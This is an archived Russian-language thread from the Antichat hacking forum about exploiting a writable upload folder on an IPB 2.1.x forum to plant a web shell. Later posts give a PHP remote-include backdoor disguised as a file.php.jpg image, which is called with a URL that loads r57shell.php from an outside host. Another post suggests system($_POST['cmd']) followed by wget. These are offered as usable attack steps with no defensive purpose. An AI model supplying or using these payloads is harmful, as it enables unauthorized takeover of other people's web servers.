Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Что можно сделать, если нашел папку 0777 (https://forum.antichat.xyz/showthread.php?t=11026)

avrely 22.11.2005 22:38

Что можно сделать, если нашел папку 0777
 
Есть на форуме папка с Chmod 0777
Можно как-нить в неё загрузить файл?

africanec 22.11.2005 22:45

какие у тебя права и т.д?

FQziT 22.11.2005 22:50

Если папка открыта на запись, то это ещё не значит, что ты прям вот так просто сможешь заливать туда что-то)))) Это можно сделать ТОЛЬКО со стороны сервера, например, через какие-нить бажные скрипты шелл залить в эту папку. Это, если я правильно понимаю -))
Тоесть просто так всё равно ничё это не даёт.

Витян 13.02.2008 01:37

форум ipb 2.1.х папка /uploads/, cmod 777, через загрузку фоты из профиля можно залить типа file.php.jpg в папке переименуецца на photo-1.txt размер загружаемого файла не больше 50 кб, залить шелл реально? или я туплю и мне пойти курить форум дальше? ...:)

Isis 13.02.2008 01:42

Хм..... если они все переименовываются в txt, то значит txt опеределяется апачем как пхп т.к. фотки ведь отображаются...
Шелл должен работать

Витян 13.02.2008 01:54

переименовываются file.php.jpg , а скрипт переименованный в file.jpg пишет Неудачная загрузка. Обратитесь к администрации форума для помощи.
шелл весит 100 кб )...нужно что-то поменьше

Xeeper 13.02.2008 01:57

Есть шеллы поменьше

Isis 13.02.2008 02:03

Сложно подумать =\

Создай файл file.php.jpg
С содержимым:
PHP код:

<?php
if(isset($_GET['xek'])) include($_GET['xek']);
?>

И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php

Piflit 13.02.2008 02:17

Цитата:

Сообщение от Isis
Сложно подумать =\

Создай файл file.php.jpg
С содержимым:
PHP код:

<?php
if(isset($_GET['xek'])) include($_GET['xek']);
?>

И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php

на некоторых хостах запрещен ремоут инклуд. так что лучше system($_POST['cmd']); а потом wget

Isis 13.02.2008 02:24

Цитата:

Сообщение от Piflit
на некоторых хостах запрещен ремоут инклуд. так что лучше system($_POST['cmd']); а потом wget

На некоторых хостах запрещен system :D


Время: 00:26